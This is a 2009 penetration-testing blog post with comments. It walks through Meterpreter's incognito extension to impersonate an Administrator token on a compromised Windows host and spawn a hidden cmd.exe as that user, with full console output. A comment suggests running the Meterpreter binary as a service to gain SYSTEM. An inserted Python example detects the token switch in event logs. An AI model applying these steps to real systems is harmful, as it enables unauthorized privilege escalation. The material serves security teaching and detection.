Friday, April 10, 2009

More on working with Incognito and Metasploit

Since a buddy asked for some clarification on using the incognito extension with Metasploit/Meterpreter, I'll post some more notes on it.

The background you need is here:
http://www.mwrinfosecurity.com/publications/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf

Let's set up the scenario.

We either exploited something...yea! or we guessed an admin password and used the psexec module (that's what I did). The psexec module will drop us to a SYSTEM shell if all went well.


msf exploit(psexec) > sessions

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.102:52595 -> 192.168.1.103:31851

msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: ORACLE-ENT
OS : Windows .NET Server (Build 3790, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > use incognito
Loading extension incognito...success.

Now we want to query what tokens are available.

Incognito Commands
==================

Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token

meterpreter > list_tokens
Usage: list_tokens

Lists all accessible tokens and their privilege level

OPTIONS:

-g List tokens by unique groupname
-u List tokens by unique username

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
ORACLE-ENT\Administrator

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

We want to become the ORACLE-ENT\Administrator user.

meterpreter > impersonate_token
Usage: impersonate_token

Instructs the meterpreter thread to impersonate the specified token. All other actions
will then be made in the context of that token.

Hint: Double backslash DOMAIN\\name (meterpreter quirk)
Hint: Enclose with quotation marks if name contains a space

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token ORACLE-ENT\\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENT\Administrator
meterpreter > getuid
Server username: ORACLE-ENT\Administrator

Weeeeeeeeee!

Ok, should you need to get back to SYSTEM, just do a rev2self.

meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token ORACLE-ENT\\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENT\Administrator
meterpreter > getuid
Server username: ORACLE-ENT\Administrator

Now you'll probably want to run commands as that user...I hope that was the point of all this...

After you load the incognito extension, you'll get an extra option (-t) in your execute options.

meterpreter > execute
Usage: execute -f file [options]

Executes a command on the remote machine.

OPTIONS:

-H Create the process hidden from view.
-a The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d The 'dummy' executable to launch when using -m.
-f The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-m Execute from memory.
-t Execute process with currently impersonated thread token

We need to use "-t" so the new process is created with the impersonated thread token; otherwise you'll get a shell as SYSTEM or whoever you were.

meterpreter > execute -f cmd.exe -H -c -i -t
Process 2936 created.
Channel 6 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\>whoami
whoami
oracle-ent\administrator

C:\>
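
From the defender's side, the process creation above (a SYSTEM-owned process starting cmd.exe under the Administrator token) can be hunted in process-creation logs. The following is an added example, not part of the original post: it assumes a newer Windows version that records Security event 4688 with Target Subject fields, exported as one JSON object per line; the allowlist and the sample events are constructed for illustration.

```python
import json

SYSTEM_SID = "S-1-5-18"
# Targets to ignore: NULL SID (no separate token), SYSTEM, LOCAL/NETWORK SERVICE.
IGNORED_TARGET_SIDS = {"S-1-0-0", "S-1-5-18", "S-1-5-19", "S-1-5-20"}
# Assumed allowlist of parents expected to start processes for logged-on users.
EXPECTED_PARENTS = {r"c:\windows\system32\winlogon.exe",
                    r"c:\windows\system32\svchost.exe"}

def token_switch_alerts(json_lines):
    """Return (host, target user, new process, parent) for every 4688 event in
    which a SYSTEM creator started a process under another user's token."""
    alerts = []
    for line in json_lines:
        ev = json.loads(line)
        if ev.get("EventID") != 4688 or ev.get("SubjectUserSid") != SYSTEM_SID:
            continue
        if ev.get("TargetUserSid", "S-1-0-0") in IGNORED_TARGET_SIDS:
            continue
        parent = ev.get("ParentProcessName", "").lower()
        if parent in EXPECTED_PARENTS:
            continue
        user = ev.get("TargetDomainName", "?") + "\\" + ev.get("TargetUserName", "?")
        alerts.append((ev.get("Computer"), user, ev.get("NewProcessName"), parent))
    return alerts

# Constructed sample events; the SID and paths are made up for the demo.
ADMIN_SID = "S-1-5-21-1111111111-2222222222-3333333333-500"
BASE = {"EventID": 4688, "Computer": "ORACLE-ENT", "SubjectUserSid": SYSTEM_SID}
SAMPLE = [json.dumps(dict(BASE, **extra)) for extra in (
    # A service starting a child with its own token: target is the NULL SID.
    {"TargetUserSid": "S-1-0-0", "TargetDomainName": "-", "TargetUserName": "-",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\System32\services.exe"},
    # Interactive logon: winlogon starts userinit for the user (allowlisted).
    {"TargetUserSid": ADMIN_SID, "TargetDomainName": "ORACLE-ENT",
     "TargetUserName": "Administrator",
     "NewProcessName": r"C:\Windows\System32\userinit.exe",
     "ParentProcessName": r"C:\Windows\System32\winlogon.exe"},
    # The pattern from the post: a SYSTEM process spawns cmd.exe as Administrator.
    {"TargetUserSid": ADMIN_SID, "TargetDomainName": "ORACLE-ENT",
     "TargetUserName": "Administrator",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\Temp\svc-example.exe"},
)]

if __name__ == "__main__":
    for alert in token_switch_alerts(SAMPLE):
        print("ALERT", *alert)
```

The parent allowlist is the part to tune per environment, since scheduled tasks and logon processes legitimately start user-context processes from SYSTEM.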

5 comments:

Netlacky said...

Completely awesome! Thanks for the post, and the MWR Infosecurity paper reference.

Anonymous said...

Chris.. once again, you rock.

Anonymous said...

Is the "find_token REMOTEHOST" command going to be implemented in this incognito extension for meterpreter?

Thanks for the post, the MWR Infosecurity paper was a really good read.

sid said...

Hey CG,
Nice post. Is there any easy way to become system from administrator and then use incognito? The impersonation has failed for me if I get a meterpreter shell as Admin user (e.g. by using msfpayload) and not as system by exploiting stuff.

I have tried becoming admin to system first and that worked, but then becoming system to some other user, again failed.

Any comments?

CG said...

I'd set up the meterpreter binary as a service or using at/sc. Your connect back should be as system and the token tools should work for you.